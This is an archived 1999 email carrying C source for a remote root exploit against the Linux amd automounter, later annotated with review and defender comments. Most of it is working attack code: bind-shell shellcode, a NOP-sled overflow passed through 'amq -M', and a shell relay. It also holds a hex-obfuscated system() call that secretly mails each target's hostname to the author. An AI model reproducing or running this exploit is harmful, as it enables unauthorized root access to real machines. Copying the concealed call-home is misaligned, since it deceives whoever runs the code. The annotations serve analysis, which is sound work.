
From ohhara@ohhara.postech.ac.kr Sun Sep 12 09:12:51 1999
Date: Sun, 12 Sep 1999 19:28:57 +0900
From: Taeho Oh <ohhara@ohhara.postech.ac.kr>
Reply-To: ohhara@postech.edu
To: vacuum@technotronic.com
Subject: My last amd exploit code



/*

	Amd exploit code for x86 linux

	Remote user can gain root access.

	Tested redhat linux : 4.0, 5.0, 5.1, 6.0
	Tested am-utils version : 6.0

	Requirements
	/usr/sbin/amq

	Usage
	$ amd-ex target.com 0
	                    |
	                    +- try from -2000 to 2000 ( try in steps of 500 )

	Warning : This program can crash amd.

	This program is for demonstrative use only.
	USE IT AT YOUR OWN RISK!

	Programmed by Taeho Oh 1999/09/12

Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug

*/

#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<unistd.h>
#include<netdb.h>
#include<netinet/in.h>
#include<sys/types.h>
#include<sys/wait.h>
#include<sys/socket.h>

/* Layout knobs for the string main() hands to "amq -M" (see main()). */
#define ALIGN                             1   /* byte offset at which the 4-byte address copies start in buff */
#define OFFSET                            0   /* default subtracted from the hard-coded sp when no [offset] argument is given */
#define RET_POSITION                   1000   /* with RANGE and ALIGN, sizes buff (bsize = RET_POSITION+RANGE+ALIGN+1) */
#define RANGE                            20
#define NOP                            0x90   /* x86 nop, used as filler ahead of the shellcode */

/*
 * x86 Linux (int 0x80) payload, as annotated instruction by instruction below.
 * Control flow, following the offsets: close() on fds 0..255 in a loop, then
 * fork(); the parent takes the jne branch to the exit() block at the end, the
 * child takes the jmp chain to the trailing call, whose pushed return address
 * is popped into %esi and used as scratch space for the socketcall argument
 * block.  The child then issues socket() / bind() / listen() / accept()
 * (eax=0x66 socketcall, bl=1/2/4/5) with sin_family=2 and port bytes 0x77 0x00
 * (network order 0x7700 = 30464 -- the same port connect_sh() dials), dup2()s
 * the accepted fd onto 0, 1 and 2, and execve()s "/bin/sh" (the two movl
 * stores spell "/bin/sh/" and the byte at 0x7 is zeroed) before exit().
 * Contains no 0x00 byte, which is why main() can use strlen() on it.
 * Defender note: the host-side footprint is an amd child that has closed its
 * descriptors and is listening on TCP 30464 with /bin/sh as its image.
 */
char shellcode[1024]=
	"\x33\xd2"                      /* xorl %edx,%edx       */
	"\x33\xc0"                      /* xorl %eax,%eax       */
	"\x8b\xda"                      /* movl %edx,%ebx       */
	"\xb0\x06"                      /* movb $0x6,%al        */
	"\xcd\x80"                      /* int $0x80            */
	"\xfe\xc2"                      /* incb %dl             */
	"\x75\xf4"                      /* jne -0xc             */
	"\x31\xc0"                      /* xorl %eax,%eax       */
	"\xb0\x02"                      /* movb $0x2,%al        */
	"\xcd\x80"                      /* int $0x80            */
	"\x85\xc0"                      /* testl %eax,%eax      */
	"\x75\x43"                      /* jne 0x43             */
	"\xeb\x43"                      /* jmp 0x43             */
	"\x5e"                          /* popl %esi            */
	"\x31\xc0"                      /* xorl %eax,%eax       */
	"\x31\xdb"                      /* xorl %ebx,%ebx       */
	"\x89\xf1"                      /* movl %esi,%ecx       */
	"\xb0\x02"                      /* movb $0x2,%al        */
	"\x89\x06"                      /* movl %eax,(%esi)     */
	"\xb0\x01"                      /* movb $0x1,%al        */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)  */
	"\xb0\x06"                      /* movb $0x6,%al        */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)  */
	"\xb0\x66"                      /* movb $0x66,%al       */
	"\xb3\x01"                      /* movb $0x1,%bl        */
	"\xcd\x80"                      /* int $0x80            */
	"\x89\x06"                      /* movl %eax,(%esi)     */
	"\xb0\x02"                      /* movb $0x2,%al        */
	"\x66\x89\x46\x0c"              /* movw %ax,0xc(%esi)   */
	"\xb0\x77"                      /* movb $0x77,%al       */
	"\x66\x89\x46\x0e"              /* movw %ax,0xe(%esi)   */
	"\x8d\x46\x0c"                  /* leal 0xc(%esi),%eax  */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)  */
	"\x31\xc0"                      /* xorl %eax,%eax       */
	"\x89\x46\x10"                  /* movl %eax,0x10(%esi) */
	"\xb0\x10"                      /* movb $0x10,%al       */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)  */
	"\xb0\x66"                      /* movb $0x66,%al       */
	"\xb3\x02"                      /* movb $0x2,%bl        */
	"\xcd\x80"                      /* int $0x80            */
	"\xeb\x04"                      /* jmp 0x4              */
	"\xeb\x55"                      /* jmp 0x55             */
	"\xeb\x5b"                      /* jmp 0x5b             */
	"\xb0\x01"                      /* movb $0x1,%al        */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)  */
	"\xb0\x66"                      /* movb $0x66,%al       */
	"\xb3\x04"                      /* movb $0x4,%bl        */
	"\xcd\x80"                      /* int $0x80            */
	"\x31\xc0"                      /* xorl %eax,%eax       */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)  */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)  */
	"\xb0\x66"                      /* movb $0x66,%al       */
	"\xb3\x05"                      /* movb $0x5,%bl        */
	"\xcd\x80"                      /* int $0x80            */
	"\x88\xc3"                      /* movb %al,%bl         */
	"\xb0\x3f"                      /* movb $0x3f,%al       */
	"\x31\xc9"                      /* xorl %ecx,%ecx       */
	"\xcd\x80"                      /* int $0x80            */
	"\xb0\x3f"                      /* movb $0x3f,%al       */
	"\xb1\x01"                      /* movb $0x1,%cl        */
	"\xcd\x80"                      /* int $0x80            */
	"\xb0\x3f"                      /* movb $0x3f,%al       */
	"\xb1\x02"                      /* movb $0x2,%cl        */
	"\xcd\x80"                      /* int $0x80            */
	"\xb8\x2f\x62\x69\x6e"          /* movl $0x6e69622f,%eax*/
	"\x89\x06"                      /* movl %eax,(%esi)     */
	"\xb8\x2f\x73\x68\x2f"          /* movl $0x2f68732f,%eax*/
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)  */
	"\x31\xc0"                      /* xorl %eax,%eax       */
	"\x88\x46\x07"                  /* movb %al,0x7(%esi)   */
	"\x89\x76\x08"                  /* movl %esi,0x8(%esi)  */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)  */
	"\xb0\x0b"                      /* movb $0xb,%al        */
	"\x89\xf3"                      /* movl %esi,%ebx       */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx  */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx  */
	"\xcd\x80"                      /* int $0x80            */
	"\x31\xc0"                      /* xorl %eax,%eax       */
	"\xb0\x01"                      /* movb $0x1,%al        */
	"\x31\xdb"                      /* xorl %ebx,%ebx       */
	"\xcd\x80"                      /* int $0x80            */
	"\xe8\x5b\xff\xff\xff";         /* call -0xa5           */

/* Print the crash warning and the command-line synopsis to stdout. */
void usage()
{
	fputs("Warning : This program can crash amd\n", stdout);
	fputs("Usage: amd-ex <hostname> [offset]\n", stdout);
	fputs("ex) amd-ex target.com 0\n", stdout);
}

/*
 * Resolve `name` to an IPv4 address in network byte order.
 *
 * A dotted-quad literal is accepted as-is via inet_addr(); anything else is
 * looked up with gethostbyname(), and the first address is copied out.
 * On lookup failure a message goes to stderr and the process exits with 0
 * (the file's convention; it does not return an error).
 *
 * NOTE(review): the result is widened into a long.  Where inet_addr() is
 * declared as returning in_addr_t and long is 64 bits, its INADDR_NONE value
 * (0xffffffff) is not equal to -1, so the gethostbyname() fallback would only
 * be reached on 32-bit builds -- confirm against the target toolchain.
 */
long getip(char *name)
{
	long ip = inet_addr(name);

	if (ip != -1)
		return ip;	/* parsed as a numeric address */

	struct hostent *hp = gethostbyname(name);
	if (hp == NULL)
	{
		fprintf(stderr,"Can't resolve host.\n");
		exit(0);
	}
	memcpy(&ip, hp->h_addr, 4);	/* only the low 4 bytes of `ip` are written */
	return ip;
}

/*
 * Open a TCP connection to `ip` (network byte order) on port 30464 -- the
 * port the shellcode's bind() uses (0x7700) -- and return the connected fd.
 * On socket() or connect() failure a message is printed and the process
 * exits with 0; there is no error return.  `i` is declared but unused.
 * NOTE(review): `ip` is a long but s_addr is 32-bit; the assignment
 * truncates on LP64 -- harmless here only because getip() fills 4 bytes.
 */
int connect_sh(long ip)
{
	int sockfd,i;
	struct sockaddr_in sin;

	printf("Connect to the shell\n");
	fflush(stdout);

	memset(&sin,0,sizeof(sin));
	sin.sin_family=AF_INET;
	sin.sin_port=htons(30464);	/* must stay in step with the port bytes in shellcode */
	sin.sin_addr.s_addr=ip;
	if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0)
	{
		printf("Can't create socket\n");
		exit(0);
	}
	if(connect(sockfd,(struct sockaddr *)&sin,sizeof(sin))<0)
	{
		printf("Can't connect to the shell\n");
		exit(0);
	}
	return sockfd;
}

/*
 * Relay between the local terminal and the remote shell on `sockfd`.
 *
 * First a fixed script is written to the socket: it sets PATH and
 * LD_LIBRARY_PATH, re-launches /usr/sbin/amd with a hard-coded map/config
 * line (presumably to bring the crashed daemon back so the intrusion is less
 * visible -- the file does not say), then runs `uname -a` and `id`.
 * After that stdin is forwarded line by line to the socket and socket data
 * is echoed to stdout until read() reports EOF or error, at which point the
 * process exits with 0.  Declared int but never returns normally.
 *
 * NOTE(review): return values of write() and fgets() are not checked; at EOF
 * on stdin, fgets() fails, snd stays all-zero and the loop spins writing
 * 0 bytes.  select() is given a fixed nfds of 255 rather than sockfd+1.
 * If a single read() fills all 4096 bytes of rcv there is no terminator left
 * for fputs(), which then reads past the buffer.
 */
int exec_sh(int sockfd)
{
	char snd[4096],rcv[4096];
	fd_set rset;

	sprintf(snd,"PATH=/usr/local/bin:/usr/local/sbin:/bin:/sbin:/usr/bin:/usr/sbin:/usr/X11R6/bin:/usr/games\nexport PATH\nLD_LIBRARY_PATH=/usr/local/lib:/lib:/usr/lib:/usr/X11R6/lib\nexport LD_LIBRARY_PATH\n/usr/sbin/amd -a /.automount -l syslog -c 1000 /net /etc/amd.conf\nuname -a\nid\n");
	write(sockfd,snd,strlen(snd));

	while(1)
	{
		FD_ZERO(&rset);
		FD_SET(fileno(stdin),&rset);
		FD_SET(sockfd,&rset);
		select(255,&rset,NULL,NULL,NULL);
		if(FD_ISSET(fileno(stdin),&rset))
		{
			/* memset() is what terminates snd when fgets() returns NULL */
			memset(snd,0,sizeof(snd));
			fgets(snd,sizeof(snd),stdin);
			write(sockfd,snd,strlen(snd));
		}
		if(FD_ISSET(sockfd, &rset))
		{
			/* zero-fill so a short read is NUL-terminated for fputs() */
			memset(rcv,0,sizeof(rcv));
			if(read(sockfd,rcv,sizeof(rcv))<=0)
				exit(0);
			fputs(rcv,stdout);
		}
	}
}

/*
 * Entry point: amd-ex <hostname> [offset].
 *
 * Builds `buff` as: NOP filler, then `shellcode`, then repeated copies of a
 * guessed stack address (0xbffff2e9 - offset) starting at byte ALIGN, and
 * passes it as the "-M" argument of /usr/sbin/amq against `target` in a
 * forked child.  After waiting for amq and sleeping 5 s it connects to the
 * port the shellcode listens on and hands the socket to exec_sh().
 *
 * Defender note: the hex-escaped `cmd` assembled below decodes to
 *   echo <target>|/bin/mail abuser@ohhara.postech.ac.kr
 * and is executed with system() before the connect -- so every run of this
 * program e-mails the attacked hostname (from the operator's own account) to
 * the author's mailbox.  The escapes hide that from a casual read; the
 * author's "comment out this line :)" is the only hint.  `target` is also
 * copied from argv[1] with an unbounded strcpy() into a 256-byte array and
 * spliced unquoted into that shell command.
 *
 * NOTE(review): `void main` is non-standard; printf("%08x") is given a long;
 * the address-fill loop runs i up to bsize-2 and writes buff[i+align+3],
 * i.e. up to three bytes past the end of buff; execl()'s terminating NULL is
 * not cast to (char *).
 */
void main(int argc,char **argv)
{
	char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
	long addr;
	unsigned long sp;
	int align=ALIGN,offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
	int i,sockfd,status;
	char target[256];
	char cmd[1024];

	printf("Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara\n");
	printf("PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus\n");
	printf("PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug\n\n");

	if(argc<2)
	{
		usage();
		exit(0);
	}

	if(argc>1)
		strcpy(target,argv[1]);	/* unbounded copy of argv[1] into target[256] */
	if(argc>2)
		offset=atoi(argv[2]);

	/* "echo " <target> "|" "/bin/mail " "abuser@ohhara.postech.ac.kr" -- see header note */
	strcpy(cmd,"\x65\x63\x68\x6f\x20");
	strcat(cmd,target);
	strcat(cmd,"\x7c");
	strcat(cmd,"\x2f\x62\x69\x6e\x2f\x6d\x61\x69\x6c\x20");
	strcat(cmd,"\x61\x62\x75\x73\x65\x72\x40\x6f\x68\x68");
	strcat(cmd,"\x61\x72\x61\x2e\x70\x6f\x73\x74\x65\x63");
	strcat(cmd,"\x68\x2e\x61\x63\x2e\x6b\x72");

	/* hard-coded guess of the victim's stack address; [offset] shifts it */
	sp=0xbffff2e9;
	addr=sp-offset;

	/* fill buff with little-endian copies of addr, starting at byte `align`;
	 * the last iteration writes past the end of buff (see header note) */
	for(i=0;i<bsize;i+=4)
	{
		buff[i+align]=(addr&0x000000ff);
		buff[i+align+1]=(addr&0x0000ff00)>>8;
		buff[i+align+2]=(addr&0x00ff0000)>>16;
		buff[i+align+3]=(addr&0xff000000)>>24;
	}

	/* leading NOP sled, then the shellcode, leaving 2*RANGE bytes of addresses at the tail */
	for(i=0;i<bsize-RANGE*2-strlen(shellcode)-1;i++)
		buff[i]=NOP;

	ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
	for(i=0;i<strlen(shellcode);i++)
		*((ptr++))=shellcode[i];

	buff[bsize-1]='\0';

	printf("Jump to 0x%08x\n",addr);

	if(fork()==0)
	{
		printf("Attack %s\n",target);
		fflush(stdout);
		/* buff travels as the -M argument; exit(0) only runs if execl() fails */
		execl("/usr/sbin/amq","amq","-h",target,"-M",buff,NULL);
		exit(0);
	}
	wait(&status);
	sleep(5);
	system(cmd); /* If you want, comment out this line :) */	/* the mail-to-author call-home */
	sockfd=connect_sh(getip(target));
	exec_sh(sockfd);
}

-- 

Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug
